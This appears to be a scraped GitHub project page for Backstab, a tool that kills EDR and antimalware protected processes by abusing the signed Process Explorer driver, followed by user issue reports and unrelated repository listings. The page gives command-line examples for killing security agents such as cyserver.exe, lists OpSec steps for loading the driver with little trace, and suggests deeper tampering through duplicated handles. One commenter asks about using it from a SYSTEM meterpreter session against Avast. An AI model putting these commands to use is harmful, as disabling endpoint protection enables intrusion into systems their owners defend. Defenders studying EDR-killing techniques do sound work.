A tool to kill antimalware protected processes

Overview

Backstab

Kill EDR Protected Processes

Have these local admin credentials but the EDR is standing in the way? Unhooking or direct syscalls are not working against the EDR? Well, why not just kill it? Backstab is a tool capable of killing antimalware protected processes by leveraging sysinternals’ Process Explorer (ProcExp) driver, which is signed by Microsoft.

What can it do?

Usage: backstab.exe <-n name || -p PID> [options]  
	-n,	Choose process by name, including the .exe suffix
	-p, 	Choose process by PID
	-l, 	List handles of protected process
	-k, 	Kill the protected process by closing its handles
	-x, 	Close a specific handle
	-d, 	Specify path to where ProcExp will be extracted
	-s, 	Specify service name registry key
	-u, 	Unload ProcExp driver
	-a,	adds SeDebugPrivilege
	-h, 	Print this menu

	Examples:
	backstab.exe -n cyserver.exe -k 			[kill cyserver]
	backstab.exe -n cyserver.exe -x E4C 		[Close handle E4C of cyserver]
	backstab.exe -n cyserver.exe -l 			[list all handles of cyserver]
	backstab.exe -p 4326 -k -d c:\\driver.sys 	[kill protected process with PID 4326, extract ProcExp driver to C:\ drive]

How is that possible?

ProcExp has a signed kernel driver that it loads on startup, which allows it to kill handles that cannot be killed even as an administrator. When you use the UI, you cannot kill a protected process, but you can kill it handles because ProcExp UI instructs the kernel driver to kill those handles. Backstab does the same thing but without the UI element.

OpSec

Here is a quick rundown of what happens

  1. Embedded driver is dropped to disk
  2. Registry key under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services is created
  3. The privilege SE_PRIVILEGE_ENABLED is acquired because it is necessary to load the driver
  4. Driver is loaded using NtLoadDriver to avoid creating a service
  5. The created Registry key is deleted (service not visible during execution)
  6. Communication with the driver is via using DeviceIoControl
  7. For handle enumeration, NtQuerySystemInformation is called

What you should also know

  1. The behavior of the tool mimics that of ProcExp. ProcExp drops the driver to the disk, create registry key under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services, calls NtLoadDriver, and then delete the registry key
  2. You can specify the location to which the driver is dropped and the service name
  3. When done, the app will unload the driver. The driver is unloaded by first re-creating the registry keys and then calling NtUnloadDriver
  4. The loaded driver is signed by MS
  5. The process does not attempt to directly kill protected processes handles, it instructs ProcExp driver to kill them. You won't be accused of attempting to tamper with any processes

Further Research

While the tool purpose is listing and killing handles, the opportunities are vast. It is possible to duplicate the handles to your own process instead of killing them. This could allow for deeper tampering where you write to files, fire events, hold mutexes. To support further research, I tried to make the code readable and split it to many methods to facilitate reuse, I also left a description on all ProcExp related methods. Feel free to reach out to me on Twitter or by Email

Credits

  • Author: Yasser Alhazmi (@Yas_o_h)
  • Pavel Yosifovich: (@Zodiacon) mentioned to us during his awesome Windows Internals Course that kernel drivers like ProcExp might cause too much unintended damage
  • Cornelis de Plaa @Cn33liz and Outflank Team @OutflankNL: for Ps-Tools and their outstanding Github repos, always informative
  • Mark Russinovich: for ProcExp, and all Sysinternals tools!
Comments
  • Could not connect to ProcExp device

    Could not connect to ProcExp device

    Hi! Any idea why this is happening? image

    Also, when dropping to a custom path, a new error appears: image

    I have compiled the project using the latest MSVC 16.10 on x64.

    opened by bgospodaru 5
  • Could not connect to ProcExp device: 5

    Could not connect to ProcExp device: 5

    not use administrator in cmd C:\Users\mtest\Desktop>Backstab.exe -n OneDrive.exe -k -d c:\driver2.sys extracting the drive to c:\driver2.sys WriteResourceToDisk.CreateFile: 5 SetRegistryValues.RegCreateKeyExA: 1300 NtUnloadDriver.SetRegistryKeyValues: 1300 Could not load driver: 1300

    C:\Users\mtest\Desktop>


    ues administrator in cmd

    C:\Users\mtest\Desktop>Backstab.exe -n OneDrive.exe -k -d c:\driver2.sys extracting the drive to c:\driver2.sys ConnectToProcExpDevice: 5 Could not connect to ProcExp device: 5

    C:\Users\mtest\Desktop>


    ues administrator in posershell

    C:\Users\mtest\Desktop>Backstab.exe -n OneDrive.exe -k -d c:\driver2.sys

    extracting the drive to c:\driver2.sys ProcExpKillHandle.DeviceIoControl: 6 ProcExpKillHandle.DeviceIoControl: 6 ProcExpKillHandle.DeviceIoControl: 6 ProcExpKillHandle.DeviceIoControl: 6 ProcExpKillHandle.DeviceIoControl: 6 ProcExpKillHandle.DeviceIoControl: 6 ProcExpKillHandle.DeviceIoControl: 6 ProcExpKillHandle.DeviceIoControl: 6


    ues administrator in cmd C:\Users\mtest\Desktop>whoami /priv

    特权信息

    特权名 描述 状态 ========================================= ================================== ====== SeIncreaseQuotaPrivilege 为进程调整内存配额 已禁用 SeSecurityPrivilege 管理审核和安全日志 已禁用 SeTakeOwnershipPrivilege 取得文件或其他对象的所有权 已禁用 SeLoadDriverPrivilege 加载和卸载设备驱动程序 已禁用 SeSystemProfilePrivilege 配置文件系统性能 已禁用 SeSystemtimePrivilege 更改系统时间 已禁用 SeProfileSingleProcessPrivilege 配置文件单一进程 已禁用 SeIncreaseBasePriorityPrivilege 提高计划优先级 已禁用 SeCreatePagefilePrivilege 创建一个页面文件 已禁用 SeBackupPrivilege 备份文件和目录 已禁用 SeRestorePrivilege 还原文件和目录 已禁用 SeShutdownPrivilege 关闭系统 已禁用 SeDebugPrivilege 调试程序 已禁用 SeSystemEnvironmentPrivilege 修改固件环境值 已禁用 SeChangeNotifyPrivilege 绕过遍历检查 已启用 SeRemoteShutdownPrivilege 从远程系统强制关机 已禁用 SeUndockPrivilege 从扩展坞上取下计算机 已禁用 SeManageVolumePrivilege 执行卷维护任务 已禁用 SeImpersonatePrivilege 身份验证后模拟客户端 已启用 SeCreateGlobalPrivilege 创建全局对象 已启用 SeIncreaseWorkingSetPrivilege 增加进程工作集 已禁用 SeTimeZonePrivilege 更改时区 已禁用 SeCreateSymbolicLinkPrivilege 创建符号链接 已禁用 SeDelegateSessionUserImpersonatePrivilege 获取同一会话中另一个用户的模拟令牌 已禁用

    C:\Users\mtest\Desktop>

    我认为是cmd管理员权限中的SeDebugPrivilege 被禁用导致的问题,能否在程序中启用SeDebugPrivilege 检查? 或者在程序中启动SeDebugPrivilege 权限

    opened by wgetnz 3
  • Could not connect to ProcExp device: 5

    Could not connect to ProcExp device: 5

    D:\Users\max\Desktop\git\Backstab-master\x64\Release>backstab.exe -n avpui.exe -k no special driver dir specified, extracting to current dir WriteResourceToDisk.CreateFile: 32 ConnectToProcExpDevice: 5 Could not connect to ProcExp device: 5

    windows 10 1909 x64

    opened by wgetnz 1
  • Clean-up

    Clean-up

    Adding unloading driver and removing the extracted driver (it's cleaner). Had to get the handle out in order to be able to close it at the end of the operation. I left that SetDebugPrivilege but commented it out. To be checked further.

    opened by k4nfr3 0
  • How to use this in real scenario?

    How to use this in real scenario?

    Assuming I have have an authority system meterpreter session active on a remote target and I want to kill Avast process (which is secured by self-defense), does Backstab work on a remote target system?

    opened by czonta96 2
Releases(v1.0.1-beta)
Owner
Yasser
Yasser
Quake Enhanced mod where one player (The Juggernaut) is very strong and all other players have to kill the Juggernaut

QE Juggernaut Quake Enhanced Juggernaut (A modification of the QEHunter mod by JPiolho.) This is a multiplayer mod where one player is the Juggernaut.

null 2 Jun 6, 2022
KingOS - 32-bits Protected Mode Operating System

KingOS A 32-bits Operating System King Operating System is a new and lightweight Operating System operating in 32-bits protected mode with an Assembly

King 1 Dec 29, 2021
A tool for detecting manual/direct syscalls in x86 and x64 processes using Nirvana Hooks.

manual-syscall-detect A tool for detecting manual/direct syscalls in x86 and x64 processes using Nirvana Hooks. Description A full write-up of this to

Conor Richard 71 Nov 17, 2022
Linux x86_64 Process Injection Utility | Manipulate Processes With Customized Payloads (beta)

K55 - Linux x86_64 Process Injection Utility (C++11) About K55 (pronounced: "kay fifty-five") The K55 payload injection tool is used for injecting x86

Josh Schiavone 57 Sep 5, 2022
Cobalt Strike BOF that uses a custom ASM HalosGate & HellsGate syscaller to return a list of processes

HalosGate Processlist Cobalt Strike BOF Cobalt Strike Beacon Object File (BOF) that uses a custom HalosGate & HellsGate syscaller, written in assembly

Bobby Cooke 50 Nov 9, 2022
This PoC uses two diferent technics for stealing the primary token from all running processes, showing that is possible to impersonate and use whatever token present at any process

StealAllTokens This PoC uses two diferent technics for stealing the primary token from all running processes, showing that is possible to impersonate

lab52.io 48 Oct 31, 2022
List & Read the processes memory using Windows APIs (PSAPI/ToolHelpAPI/WTSAPI)

Dumper List & Read the processes memory using Windows APIs PSAPI ToolHelp WTSAPI Usage The Dumper tool list the running procceses and provide the abil

ムハンマド 5 Oct 12, 2022
Detect-KeAttachProcess by iterating through all processes as well as checking the context of the thread.

Detect-KeAttachProcess Detect-KeAttachProcess - by iterating through all processes as well as checking the context of the thread. Recently I started s

null 92 Oct 19, 2022
Pty for Flutter. Provides the ability to create processes with pseudo terminal file descriptors.

flutter_pty This is an experimental package to explore the possibilities of using native code to implement PTY instead of pure FFI and blocking isolat

null 7 Nov 24, 2022
6D - Pose Annotation Tool (6D-PAT) - is a tool that allows the user to load a set of images and also a set of 3D models and annotate where in the 2D image the 3D object ist placed.

6D - Pose Annotation Tool (6D-PAT) For detiled explanations checkout the WikiPage. What is it? With 6D-PAT you can create 6D annotations on images for

Florian Blume 71 Nov 20, 2022
a tool to count accesses to member variables in c++ programs

access_profiler access_profiler is a heavy-weight class field access profiler, implemented as C++ library. to use this profiler, include "access_profi

Arvid Norberg 68 May 31, 2022
Updated version of Silicos-it's shape-based alignment tool

shape-it Description Code for shape-it with openbabel3 and rdkit INSTALL Following example is the basic way to install the tool: git clone https://git

RDKit 24 Nov 3, 2022
This is a tool for software engineers to view,record and analyse data(sensor data and module data) In the process of software development.

![Contributors][Huang Jianyu] Statement 由于工具源码在网上公开,除使用部分开源项目代码外,其余代码均来自我个人,工具本身不包含公司的知识产权,所有与公司有关的内容均从软件包中移除,软件发布遵循Apache协议,任何人均可下载进行修改使用,如使用过程中出现任何问

HuangJianyu 34 May 5, 2022
Kernel file/process/object tool

kt Kernel file/process/object tool killav bypass av dump lsass basic vs2019 + cpp + wdk usage(64-bit only) kdu -map sys.sys kt -F -d c:\windows\notepa

null 62 Nov 30, 2022
Minimal tool for measuring cost of mode switch

CPU mode switch statistics The mode-switch-stat tool measures the cost of CPU mode switch, the round trip between user and kernel mode. At present, th

Steven Cheng 12 Feb 22, 2022
a undetectable tool by modify odyssey, support sign disable & dylib injection, test on iphoneX(13.5.1 expolit by FreeTheSandbox), our qqgroup is 703156427

a undetectable ios root access tool by modify odyssey, support sign disable & dylib injection, test on iphoneX(13.5.1 expolit by FreeTheSandbox), our

null 58 Nov 22, 2021
An experimental tool to estimate the similarity between all pairs of contigs

This is an experimental tool to estimate the approximate distances between all pairs of unitigs. It takes a GFA or FASTA file as input and outputs a T

Heng Li 33 Mar 16, 2022
Powerful automated tool for reverse engineering Unity IL2CPP binaries

Powerful automated tool for reverse engineering Unity IL2CPP binaries

Katy 2k Nov 26, 2022
Simple tool to visualize and amplify mouse movements

mousemic Simple tool to visualize and amplify mouse movements. This utility uses a high-level X11 Api so is not really more sensitive than your screen

Alfredo Ortega 40 Nov 25, 2022